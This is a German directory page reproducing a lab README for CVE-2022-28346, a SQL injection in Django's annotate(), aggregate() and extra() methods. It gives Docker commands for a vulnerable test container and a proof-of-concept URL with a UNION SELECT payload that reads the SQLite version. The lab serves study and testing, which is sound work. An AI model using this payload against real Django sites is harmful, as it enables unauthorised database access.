Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2022-28346 — In Django-Paket wurde ein Fehler gefunden, der zu einer SQL-Injection führt. Dieser Fehler ermöglicht es einem Angreifer, mithilfe eines manipulierten Wörterbuchs mit bösartigen SQL-Abfragen die Datenbank vollständig zu kompromittieren. | Kitploit
Tools/GitHubGitHub/kamal-marouane/cve-2022-28346
SchwachstellenanalyseExploitationWebanwendungs-ExploitationLernen & BildungDatenbanksicherheitLabs & Praxis
GitHubkamal-marouane/cve-2022-28346

CVE-2022-28346

In Django-Paket wurde ein Fehler gefunden, der zu einer SQL-Injection führt. Dieser Fehler ermöglicht es einem Angreifer, mithilfe eines manipulierten Wörterbuchs mit bösartigen SQL-Abfragen die Datenbank vollständig zu kompromittieren.

Repository anzeigen
112vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2022-28346

Ein Fehler wurde im Django-Paket gefunden, der zu einer SQL-Injection führt. Dieser Fehler ermöglicht es einem Angreifer, mithilfe eines manipulierten Wörterbuchs, das bösartige SQL-Abfragen enthält, die Datenbank vollständig zu kompromittieren.

Inhaltsverzeichnis

  • CVE-2022-28346
    • Beschreibung
    • Umgebung
    • Proof of Concept und Ausnutzung
    • Referenzen

Im Code-Repository oben finden Sie den detaillierten Analysebericht (PDF) zu CVE-2022-28346.

Beschreibung

CVE-2022-28346 ist eine kritische Schwachstelle, die in verschiedenen Versionen von Django, einem beliebten Python-Webframework, identifiziert wurde. Diese Schwachstelle betrifft insbesondere Django-Versionen 2.2 vor 2.2.28, 3.2 vor 3.2.13 und 4.0 vor 4.0.4.

Der Kern des Problems liegt in den Methoden QuerySet.annotate(), aggregate() und extra() in Django. Diese Methoden sind anfällig für SQL-Injection-Angriffe, wenn Spaltenaliase zusammen mit einem manipulierten Wörterbuch (mit Wörterbucherweiterung) als übergebene **kwargs verwendet werden. SQL-Injection ist eine Angriffsart, die es einem Angreifer ermöglicht, in die Abfragen einzugreifen, die eine Anwendung an ihre Datenbank stellt. Sie kann verwendet werden, um Daten einzusehen, die sie normalerweise nicht abrufen können, einschließlich Daten anderer Benutzer oder anderer Daten, auf die die Anwendung selbst zugreifen kann. In einigen Fällen könnte ein Angreifer diese Daten ändern oder löschen, was die Datenintegrität beeinträchtigt.

Umgebung

Sollten Sie auf Probleme stoßen oder Klärung zu einem der Schritte benötigen, zögern Sie bitte nicht, uns per E-Mail zu kontaktieren :

Um einen gründlichen Test dieser Schwachstelle durchzuführen, stellen Sie sicher, dass ausreichend freier Speicherplatz auf Ihrer Festplatte vorhanden ist. Mindestens 1,2 GB sind erforderlich, um den Schwachstellentest erfolgreich durchführen zu können.

Wenn Sie bereits Docker installiert haben, können Sie diesen Abschnitt überspringen und direkt mit dem nächsten Anweisungssatz fortfahren.

Um mit dem Testen dieser Schwachstelle zu beginnen, installieren Sie Docker:

  • Docker für Linux-Umgebung installieren
  • Docker für Windows-Umgebung installieren

Vergewissern Sie sich, dass Docker betriebsbereit ist, bevor Sie mit den nächsten Schritten fortfahren.

Führen Sie in Ihrem Terminal den folgenden Befehl aus, um das Docker-Image zu erhalten, das wir erstellt und auf DockerHub hochgeladen haben:

root@kitploit:~
sudo docker pull marouanekamal/cve-2022-28346:latest


Warten Sie, bis das Docker-Image vollständig heruntergeladen ist. Wenn Probleme auftreten, könnte dies an Ihrer Internetverbindung liegen; stellen Sie sicher, dass Sie eine stabile und aktive Verbindung haben.

Nachdem die Installation abgeschlossen ist, überprüfen Sie, ob das Image vorhanden ist, indem Sie den folgenden Befehl ausführen:

root@kitploit:~
sudo docker images


Sie können das Docker-Image nun mit dem folgenden Befehl ausführen:

root@kitploit:~
sudo docker run -p 8000:8000 --name my_cve_container marouanekamal/cve-2022-28346:latest


Jetzt läuft der Server und wir können diese CVE ausnutzen ;)

Proof of Concept und Ausnutzung

Nachdem Sie das Docker-Image ausgeführt haben, können Sie den folgenden Link aufrufen, um zu überprüfen, ob die URL erreichbar ist:

root@kitploit:~
http://0.0.0.0:8000/


Das Wort ok wird angezeigt, was bedeutet, dass die URL erreichbar ist und alles einwandfrei funktioniert!

Greifen wir nun diese Schwachstelle mithilfe von SQL-Injection an. Geben Sie die folgende URL ein, um dies zu tun:

root@kitploit:~
http://0.0.0.0:8000/demo?field=demo.name" FROM "demo_user" union SELECT "1",sqlite_version(),"3" --


Wir konnten die Version der vom Server verwendeten SQLite ermitteln ;)

Referenzen

  • https://mocusez.site/posts/a3ce.html
  • https://blog.csdn.net/weixin_46944519/article/details/128496498
  • https://www.cvedetails.com/cve/CVE-2022-28346/?q=CVE-2022-28346
  • https://avd.aquasec.com/nvd/2022/cve-2022-28346/
  • https://cyber.vumetric.com/vulns/CVE-2022-28346/sql-injection-vulnerability-in-multiple-products/
  • https://www.suse.com/security/cve/CVE-2022-28346.html
  • https://docs.djangoproject.com/en/4.0/releases/security/
  • https://www.freebuf.com/vuls/332893.html


[email protected]

Tool herunterladen